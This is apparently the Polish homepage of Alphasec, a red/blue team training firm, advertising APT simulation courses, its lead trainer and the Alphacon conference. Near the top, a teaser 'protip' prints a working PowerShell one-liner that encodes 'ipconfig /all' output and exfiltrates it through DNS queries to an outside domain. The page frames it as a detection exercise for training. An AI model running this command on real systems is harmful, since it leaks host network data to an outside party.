Alphasec — szkolenia red/blue team, wykłady i symulacje APT
Alphasec · szkolenia red / blue team

Najlepiej bronią się ci, którzy wiedzą jak się atakuje.

Alphasec to praktycy red i blue team. Szkolenia in-house i wykłady prowadzi Paweł Maziarz — ponad 25 lat w IT, red team lead w firmie wielkiej czwórki, najwyżej oceniany prelegent Confidence i What The H@ck. Wiedza, która zostaje w nawykach zespołu.

alphasec@lab — pwsh · protip 008a
PS> (-join ((ipconfig /all|out-string).ToCharArray()|%{"{0:X2}"-f[int]$_}) -split "(.{64})" -match "." -replace "([\w]{16})", "`$1.").trim('.')|%{ Resolve-DNSName "$_.$(($i++)).aptmc.pl"}
// cała konfiguracja sieci wyszła zapytaniami DNS.
// twój SIEM to widzi? na szkoleniu sprawdzamy.

Jeden taki oneliner na maila, prosto z realnych zleceń. Zapisz się na protipy →

Od 2014 roku przez naszą salę przeszło 1000+ specjalistów — z zespołów pracujących m.in. w Allegro, Orange, T-Mobile, Santanderze, ING, mBanku, PZU, KPMG, Netii i Wojskowej Akademii Technicznej.

// oferta

Trzy ścieżki współpracy.

Wybierz to, co u Ciebie jest teraz najważniejsze — od pojedynczego wykładu po stały program rozwoju zespołu.

Dla zespołów i firm

Szkolenia in-house i wykłady

Wchodzimy do Twojej organizacji (lub prowadzimy zdalnie) i pokazujemy zespołowi realne techniki atakujących — tak, by umieli je rozpoznać, wykryć i zatrzymać. Konkret z pola walki i historie „z okopów", nie slajdy z definicjami. Za nami 17 edycji cyklu APT Masterclass i symulacje ataków w 7 krajach.

Pakiety
Keynote 1h Półdniowy Dniowy Cykl
Tryb
Zdalnie lub u klienta
Wycena
Indywidualna
Zamów szkolenie
// formaty on-site
Dla całej firmy

Awareness „Dark Lord"

Na żywo pokazujemy, jak napastnik „Dark Lord" przejmuje firmę — phishing, złośliwe makra, podmiana numerów kont, fałszywe WiFi, groźny pendrive. Dla osób nietechnicznych, 1–2h.

{{ dlVideoEl }}
Dla zespołów bezpieczeństwa

PowerShell w CyberSecurity

1 dzień praktyki: od podstaw po Command & Control, DNS, .NET i automatyzację. Każdy wychodzi z gotowymi narzędziami i szablonami do własnej pracy.

Hands-on, 2 dni

APT Masterclass — warsztaty

Pełny łańcuch ataku w praktyce, w oparciu o MITRE ATT&CK i Cyber Kill Chain. Ofensywa i detekcja w jednym — holistyczny obraz, który podnosi skuteczność całego zespołu.

// referencje

Co mówią ci, którzy byli na sali.

{{ r.quote }}

{{ r.name }}{{ r.role }}
// o alphasec

Z doświadczenia, nie z podręcznika.

Podnosimy poziom cyberbezpieczeństwa w organizacjach. Stawiamy na efektywność: storytelling i przykłady z realnych zleceń sprawiają, że wiedza zostaje w nawykach zespołów. Ponad 1000 przeszkolonych specjalistów, 17 edycji APT Masterclass, prelekcje wygrywające rankingi konferencji branżowych.

01 — Akademia

Szkolenia

Szkolenia otwarte i zamknięte — od podnoszenia kompetencji ekspertów po awareness dla osób nietechnicznych.

02 — Produkty

Rozwiązania

Narzędzia programowe i sprzętowe wspierające prewencję, detekcję i reagowanie — m.in. program Hacktidotum.

03 — Badania

R&D IT Security

Autorskie projekty badawcze — m.in. ConfiBadge: malware symulujące kanały C2 (ICMP, DNS) oraz transmisję przez urządzenia fizyczne — port szeregowy, fale FM.

// trener prowadzący

Paweł Maziarz

Założyciel Alphasec · trener prowadzący

Ponad 25 lat w IT: od administratora Unix/Linux, przez programistę, po pentestera i architekta. Jedna z kluczowych postaci rozwijających red team w firmie wielkiej czwórki i współzałożyciel firmy Immunity Systems. Założyciel marki Alphasec i twórca cyklu szkoleń APT Masterclass.

Przeprowadzał zaawansowane symulacje ataków klasy APT dla firm w kilku krajach (Polska, Szwajcaria, Irlandia, Azerbejdżan, Chorwacja, Łotwa, Rumunia). Specjalizuje się też w socjotechnice i bezpieczeństwie fizycznym (karty zbliżeniowe, kontrola dostępu).

Scena
Najwyżej oceniany prelegent — Confidence, What The H@ck, PLNOG, BSides Warsaw.
Rady programowe
Confidence oraz Oh My Hack.
Uczelnie
Politechnika Wrocławska, Akademia Leona Koźmińskiego, Uczelnia Łazarskiego.
Publikacje
Autor 70-stronicowego rozdziału „PowerShell w ofensywie” w książce Wprowadzenie do bezpieczeństwa IT, tom 1 (Securitum).
Specjalizacja
Symulacje APT, socjotechnika, bezpieczeństwo fizyczne.
Paweł Maziarz
// reputacja, nie marketing
Prelekcje wygrywały rankingi konferencji branżowych. To nie deklaracja — to oceny uczestników.
// scena

Zawsze w czołówce ocen.

To nie deklaracja, tylko ankiety wypełniane przez uczestników konferencji.

{{ t.title }}
{{ t.conf }} · {{ t.place }}

// …i kilkadziesiąt innych wystąpień od 2014 roku — Semafor, Admin Days, Sekurak, OWASP, Infoshare

// alphacon

Byliśmy na każdej ważnej scenie. Czas zbudować własną.

Alphacon — konferencja cybersecurity we Wrocławiu. Duża i dwudniowa raz w roku, kameralne edycje nano co kilka miesięcy.

wkrótce
Edycja kameralna · Wrocław

Alphacon nano

Jeden wieczór, około stu osób, pięć bloków od 17:30. Techniczna prelekcja, panel prowadzony na żywo z kodem na ekranie, opowieść o retro sprzęcie i lightning talki ochotników. Wymiana wiedzy, nie ścieżka sponsorska.

Hack the planet Man in the middle Back to the future Hack It Yourself
Pierwsza edycja jeszcze w tym roku.
Program i zapisy — alphacon.pl →
wkrótce
Duża edycja · dwa dni

Alphacon

Dwa dni, pełna skala, mocno technicznie. Konferencja, jakiej Wrocławiowi brakowało.

Pomysł chodzi za nami od kilku lat. Alphacon nano to pierwszy krok, żeby go domknąć — i sprawdzić, ile osób czeka na to samo.

// zasiadamy w radach programowych CONFidence i Oh My Hack — wiemy, jak takie konferencje robi się od środka

Przód badge'a Alphacon — trójkątna płytka drukowana z wyświetlaczem OLED i modułem ESP32-C6 Tył badge'a Alphacon — bateria, buzzer i listwa userportu
// badge

Badge na Alphacon nano robimy sami.

ESP32-C6, więc Wi-Fi, Bluetooth i Zigbee w jednym trójkącie. Userport wyprowadzony na wierzch — podłączasz własny moduł. Co z tym zrobisz, to już twoja sprawa.

// zapis na powiadomienie

Daj znać, gdy ruszą zapisy.

Jeden mail, gdy otworzymy rejestrację na najbliższą edycję. Nic poza tym.

✓ Zapisano. Odezwiemy się, gdy ruszy rejestracja.
// możesz zaznaczyć kilka
{{ alphaconErr }}
Wypisujesz się jednym kliknięciem.
// przykładowe protipy przewiń →
// protipy z pola walki

Krótkie protipy red/blue prosto na maila.

Konkretne wskazówki, jednolinijkowce i triki z prawdziwych zleceń. Zero spamu, zero teorii. Najlżejszy sposób, żeby zacząć z nami rozmowę.

✓ Zapisano. Pierwszy protip leci wkrótce.
{{ protipErr }}
Wypisujesz się jednym kliknięciem.
// zamów szkolenie

Opowiedz, czego potrzebujesz.

Bez cennika z półki. Opisz krótko sytuację — wrócimy z propozycją formatu i wyceną dopasowaną do Twojego zespołu. Zwykle odpowiadamy w 1–2 dni robocze.

@ info@alphasec.pl
alphasec.pl

Dzięki — zapytanie przyjęte.

Wrócimy z propozycją i wyceną w 1–2 dni robocze. Jeśli sprawa pilna, napisz wprost na info@alphasec.pl.

Poziom
Tryb
{{ briefErr }}
Alphasec

Podnosimy poziom cyberbezpieczeństwa w organizacjach. Szkolenia, które zostają w nawykach zespołów.

Nawigacja
Marka

Alphasec to parasol. W jego ramach: programy szkoleniowe APT Masterclass|FORGE, produkt Hacktidotum i konferencja Alphacon.

Kontakt
info@alphasec.pl alphasec.pl
© 2020–{{ year }} Alphasec sp. z o.o. Wszelkie prawa zastrzeżone.
przygodówka tekstowa — pisz komendy, np. ROZEJRZYJ SIE